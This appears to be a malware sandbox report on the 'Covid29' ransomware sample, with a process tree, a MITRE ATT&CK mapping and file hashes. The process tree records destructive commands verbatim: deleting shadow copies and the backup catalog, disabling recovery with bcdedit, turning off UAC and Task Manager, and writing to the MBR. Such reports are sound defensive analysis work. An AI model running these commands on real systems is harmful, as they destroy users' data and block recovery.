  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5052 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1692 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:2668
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7468 /prefetch:1
  2⤵
  PID:5788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5396 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=106 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3756 /prefetch:1
  2⤵
  PID:4268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,7679707759533435383,13854251840445398558,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4820 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:4176

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4152

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4680

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5200

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:5424

C:\Users\Admin\Downloads\Covid29 Ransomware (4)\TrojanRansomCovid29.exe
"C:\Users\Admin\Downloads\Covid29 Ransomware (4)\TrojanRansomCovid29.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:5540
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DD29.tmp\TrojanRansomCovid29.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:4176
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DD29.tmp\fakeerror.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4984
- - C:\Windows\SysWOW64\PING.EXE
    ping localhost -n 2
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:5412
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:5760
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:2816
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:2044
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:5260
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:4788
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:876
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:2268
- - C:\Users\Admin\AppData\Local\Temp\DD29.tmp\mbr.exe
    mbr.exe
    3⤵
    - Executes dropped EXE
    - Writes to the Master Boot Record (MBR)
    - System Location Discovery: System Language Discovery
    PID:2160
- - C:\Users\Admin\AppData\Local\Temp\DD29.tmp\Cov29Cry.exe
    Cov29Cry.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1320
  - - C:\Users\Admin\AppData\Roaming\svchost.exe
      "C:\Users\Admin\AppData\Roaming\svchost.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Drops desktop.ini file(s)
      Sets desktop wallpaper using registry
      Modifies registry class
      Suspicious behavior: AddClipboardFormatListener
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2692
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
        5⤵
        
        PID:5744
      - C:\Windows\system32\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        6⤵
        Interacts with shadow copies
        
        PID:2436
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1580
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
        5⤵
        
        PID:5084
      - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:876
      - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} recoveryenabled no
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:5208
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
        5⤵
        
        PID:4988
      - C:\Windows\system32\wbadmin.exe
        
        wbadmin delete catalog -quiet
        6⤵
        Deletes backup catalog
        
        PID:6092
    - - C:\Windows\system32\NOTEPAD.EXE
        
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt
        5⤵
        
        PID:5168
- - C:\Windows\SysWOW64\shutdown.exe
    shutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4936
- - C:\Windows\SysWOW64\PING.EXE
    ping localhost -n 9
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:5524
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3076
- - C:\Users\Admin\AppData\Local\Temp\DD29.tmp\Cov29LockScreen.exe
    Cov29LockScreen.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:5472

C:\Users\Admin\Downloads\Covid29 Ransomware (5)\TrojanRansomCovid29.exe
"C:\Users\Admin\Downloads\Covid29 Ransomware (5)\TrojanRansomCovid29.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:2828
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\E518.tmp\TrojanRansomCovid29.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:2960
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\E518.tmp\fakeerror.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4596
- - C:\Windows\SysWOW64\PING.EXE
    ping localhost -n 2
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3024
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:2280
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:5284
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:1200
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:1944
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:5544
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:4828
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:5508
- - C:\Users\Admin\AppData\Local\Temp\E518.tmp\mbr.exe
    mbr.exe
    3⤵
    - Executes dropped EXE
    - Writes to the Master Boot Record (MBR)
    - System Location Discovery: System Language Discovery
    PID:5168
- - C:\Users\Admin\AppData\Local\Temp\E518.tmp\Cov29Cry.exe
    Cov29Cry.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:6112
  - - C:\Users\Admin\AppData\Roaming\svchost.exe
      "C:\Users\Admin\AppData\Roaming\svchost.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4080
- - C:\Windows\SysWOW64\shutdown.exe
    shutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3700
- - C:\Windows\SysWOW64\PING.EXE
    ping localhost -n 9
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2916
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3540
- - C:\Users\Admin\AppData\Local\Temp\E518.tmp\Cov29LockScreen.exe
    Cov29LockScreen.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:5312

C:\Windows\System32\PickerHost.exe
C:\Windows\System32\PickerHost.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4328

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5972

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2944

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:4460

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:2712

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
1⤵
PID:6012

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding
1⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- Modifies Internet Explorer settings
- Modifies registry class
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5704
- C:\Users\Admin\Downloads\Covid29 Ransomware (5)\TrojanRansomCovid29.exe
  "C:\Users\Admin\Downloads\Covid29 Ransomware (5)\TrojanRansomCovid29.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\984B.tmp\TrojanRansomCovid29.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    PID:2792
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\984B.tmp\fakeerror.vbs"
      4⤵
      System Location Discovery: System Language Discovery
      PID:6048
  - - C:\Windows\SysWOW64\PING.EXE
      ping localhost -n 2
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4968
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:868
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:5292
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:3796
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:3740
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:3708
  - - C:\Windows\SysWOW64\reg.exe
      reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:5396
  - - C:\Windows\SysWOW64\reg.exe
      reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:2916
  - - C:\Users\Admin\AppData\Local\Temp\984B.tmp\mbr.exe
      mbr.exe
      4⤵
      Executes dropped EXE
      Writes to the Master Boot Record (MBR)
      System Location Discovery: System Language Discovery
      PID:3856
  - - C:\Users\Admin\AppData\Local\Temp\984B.tmp\Cov29Cry.exe
      Cov29Cry.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4696
    - - C:\Users\Admin\AppData\Roaming\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\svchost.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1372
  - - C:\Windows\SysWOW64\shutdown.exe
      shutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3028
  - - C:\Windows\SysWOW64\PING.EXE
      ping localhost -n 9
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:776

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
1⤵
PID:5416

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
- Modifies registry class
PID:4016

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {515980c3-57fe-4c1e-a561-730dd256ab98} -Embedding
1⤵
PID:5748

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Windows Management Instrumentation

T1047

Persistence

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Direct Volume Access

T1006

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
fdee96b970080ef7f5bfa5964075575e

SHA1
2c821998dc2674d291bfa83a4df46814f0c29ab4

SHA256
a241023f360b300e56b2b0e1205b651e1244b222e1f55245ca2d06d3162a62f0

SHA512
20875c3002323f5a9b1b71917d6bd4e4c718c9ca325c90335bd475ddcb25eac94cb3f29795fa6476d6d6e757622b8b0577f008eec2c739c2eec71d2e8b372cff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
46e6ad711a84b5dc7b30b75297d64875

SHA1
8ca343bfab1e2c04e67b9b16b8e06ba463b4f485

SHA256
77b51492a40a511e57e7a7ecf76715a2fd46533c0f0d0d5a758f0224e201c77f

SHA512
8472710b638b0aeee4678f41ed2dff72b39b929b2802716c0c9f96db24c63096b94c9969575e4698f16e412f82668b5c9b5cb747e8a2219429dbb476a31d297e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000013

Filesize
48KB

MD5
79c7bf2886008c78be7455d5ae0d7e37

SHA1
60bfce7e85f9a3b21ff8f7880ce7c95dfd0a35f1

SHA256
aeef8aa8ecc68db77e0149c8f2340e7c3217f5606794db2d452bcd7184449cc5

SHA512
7e320fd407eda5033fd9099367ca69dbf79558c1fa6eef817390bca590ee2de84e18cda7295f410f825c0bb2d62985084a0c5940cfee17e0f26432fe6232b638

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000020

Filesize
62KB

MD5
c813a1b87f1651d642cdcad5fca7a7d8

SHA1
0e6628997674a7dfbeb321b59a6e829d0c2f4478

SHA256
df670e09f278fea1d0684afdcd0392a83d7041585ba5996f7b527974d7d98ec3

SHA512
af0d024ba1faafbd6f950c67977ed126827180a47cea9758ee51a95d13436f753eb5a7aa12a9090048a70328f6e779634c612aebde89b06740ffd770751e1c5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000022

Filesize
70KB

MD5
3b06aa689e8bf1aed00d923a55cfdd49

SHA1
ca186701396ba24d747438e6de95397ed5014361

SHA256
cd1569510154d7fa83732ccf69e41e833421f4e5ec7f70a5353ad07940ec445c

SHA512
0422b94ec68439a172281605264dede7b987804b3acfdeeb86ca7b12249e0bd90e8e625f9549a9635165034b089d59861260bedf7676f9fa68c5b332123035ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000023

Filesize
65KB

MD5
56d57bc655526551f217536f19195495

SHA1
28b430886d1220855a805d78dc5d6414aeee6995

SHA256
f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4

SHA512
7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000024

Filesize
19KB

MD5
1bd4ae71ef8e69ad4b5ffd8dc7d2dcb5

SHA1
6dd8803e59949c985d6a9df2f26c833041a5178c

SHA256
af18b3681e8e2a1e8dc34c2aa60530dc8d8a9258c4d562cbe20c898d5de98725

SHA512
b3ff083b669aca75549396250e05344ba2f1c021468589f2bd6f1b977b7f11df00f958bbbd22f07708b5d30d0260f39d8de57e75382b3ab8e78a2c41ef428863

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002d

Filesize
18KB

MD5
09551950d3812f6bd88fa0e07e9f4457

SHA1
32873bdc2394cc0b73756d68df66d5d5ed1fe27d

SHA256
59ef1caabe983a3bd769ff0ba17211a797a1cb1b34a9070a3ce471c3310a1b33

SHA512
0f7bddc050e00361a7333df08c0fa7c73dbee8cf8bb2937970b2ebc43d81a625ef2ba4d95781b0409d62c1f6baf99e1b75cfba017c20948d84a567fd26cf6f04

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002e

Filesize
26KB

MD5
c9a44eb6dc1c77a9a2d988768c9fd5c9

SHA1
f352d7ed33ff0d8361be168a6b5300288d91ef78

SHA256
675b4a74249edb71579147676a8115b662a915db9fd24fdfcaebbb0d7618c62c

SHA512
81534ba808f32ade00a81349612c9b905914004c3a8d7e53e9993170ab5957600dd49d9881284541240181987ffc76208acedfac24bc1e8d33c99f003c65fbff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000050

Filesize
66KB

MD5
f53b6d474350dce73f4fdc90c7b04899

SHA1
b06ca246301a6aea038956d48b48e842d893c05a

SHA256
28442a56b016bfade0e368929138aaaadfc36156734e8ec7a6325b3e58fddc25

SHA512
7f275614052ebae8876ad28fc5d48e4f63ed9ebc610ed981f81377ea3ba4c49a2031ff771deb12adabcf33d4789ba35354c1e52524c067a9e7ce078703683f1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000052

Filesize
62KB

MD5
7ec99dd3121c453e659a23bc6f9106a7

SHA1
6dd16d4536c4f6e9812b54562b6d15c7712e6ffa

SHA256
448655a01aa921a8a61691e7a60104e5d84b689dbc81d007434c148795494fd3

SHA512
27f14e300cf57b701e8c3f68eb8d5f2c8b210114dd04a9e27939f85de2ed30ea2faa27080a8b9a0ff176ed313fa1dbfc60e2dc59ab5aa9d918a6d616d778a587

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000053

Filesize
31KB

MD5
fb28fb9793c5990e1d0f2108ffae55e7

SHA1
e1b3602712eaaab090dd13ab501dcd3f57925f6b

SHA256
80a7df77558be02621568e0faad2094f4fea5689728577aa47fb7422295b860b

SHA512
96e667f132b565eed7838a5f83366d394af46e5afdb91c0528d55e4cdfdf1e0613c23102a8d0e1a548ef60d5fb28346ebdbd8e3dc59672eeccbb4f027018490d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000064

Filesize
33KB

MD5
8430584fd37deeb17a0420aab73fa7c9

SHA1
16eef7aa46b0ec61a0ad52fc53892b59665439f6

SHA256
f154a206c3e7fd2b1aa4d3783864a60184225e10c31326aba497b5d7d2df4d91

SHA512
08c7b177d425841c7fa20f3122eaa91975b322e20afa443c155ef07dc06f252b5bdf53243f0bca057ece5b4599e696b39c1a925af7baa6c419deaca169e9d2be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000068

Filesize
99KB

MD5
466eef25a65997f671d88424cd75954c

SHA1
ab7a652d44454630858596298ddf98a5b1a23f6b

SHA256
0277e8c7b2d5bf2168fb3a35ad48d45ba7ef8a08d426675f3ae2c714b03eaaee

SHA512
d91eb469a944d91bb1b817ce853f1b19404379bb8e9aeb30b60704cdefb758f71fe5cc7ba75d7f685b7d342ddf66dce7253600614959e93b04ee1cf1a2334fbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00006d

Filesize
156KB

MD5
44a9064685c19753abae064d7a701e9e

SHA1
9d5eee5311e67da47174d799d5c37dc54f80791e

SHA256
af4f9cad0fffe45edeca47166898bfa78ba562a20f55995b59297cbb5df7c358

SHA512
473115eecaf17e5451c37db32e09ff00bfa64a7b67eb0d15db4f8ea2f49f154c4087813eaa765c192b8c772c8242cd7e359df69a6d8dfb589a4ec52eccfc3134

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000070

Filesize
110KB

MD5
cfc89173b1a9a2ae837c6341bd6b32f2

SHA1
eab8bd81543473ed1bf691ee58758d3d99ac77bc

SHA256
3ca6c623b97c8613540a0299d7fb16f3182375c7c63f7fb799e65990a8381cf9

SHA512
b97effb7701b7d2b5e12d2fc839987a9085f996a58afe37990c9d86584719dd82c3029fea18401b37a4d3969649fd37f80b22160153af86a6d9bca041955c886

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000074

Filesize
20KB

MD5
d8ff006363de5d28efc4bc41cddd6c7a

SHA1
b4950449bfcfde423c8fecc368257dcf2a346258

SHA256
0f2f2c4216f85517ab2f608010108f32416a23607fbaaf4e2294379073fae161

SHA512
11ad965b3eb86c073d96c808eb4b4fae5f6eafcf9ff0bccb74cf1aec7fc47154bdc16b2cd436a3c8ae069502b37ee24af78176344af0b6aa7b8de4e8896aa045

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000075

Filesize
20KB

MD5
4c0e50267e16196f98c0817785a8c125

SHA1
23064de7af9d53d06a82fcfb4cb107731127c437

SHA256
5e5dd8d3d067b5a50d9284de24e90b9538b96938d56b024074ef602ae7d83584

SHA512
86ca6e9de22af6d21ac57a3775cdb4a287ee39c1cf656d9dffca64ed09f13dd54c30f324e2ee322014272d504e5a4c09297ba8b75a742f4ee67e314c80021e54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000078

Filesize
20KB

MD5
0289d2ca2b93affa4e38424e137799d3

SHA1
82a4775b9fb386f9705cf1f917149afe690623e5

SHA256
2049fbaf83f6baea7539ba2b3693240013269c4b8d4926e727b8464a8f9d953f

SHA512
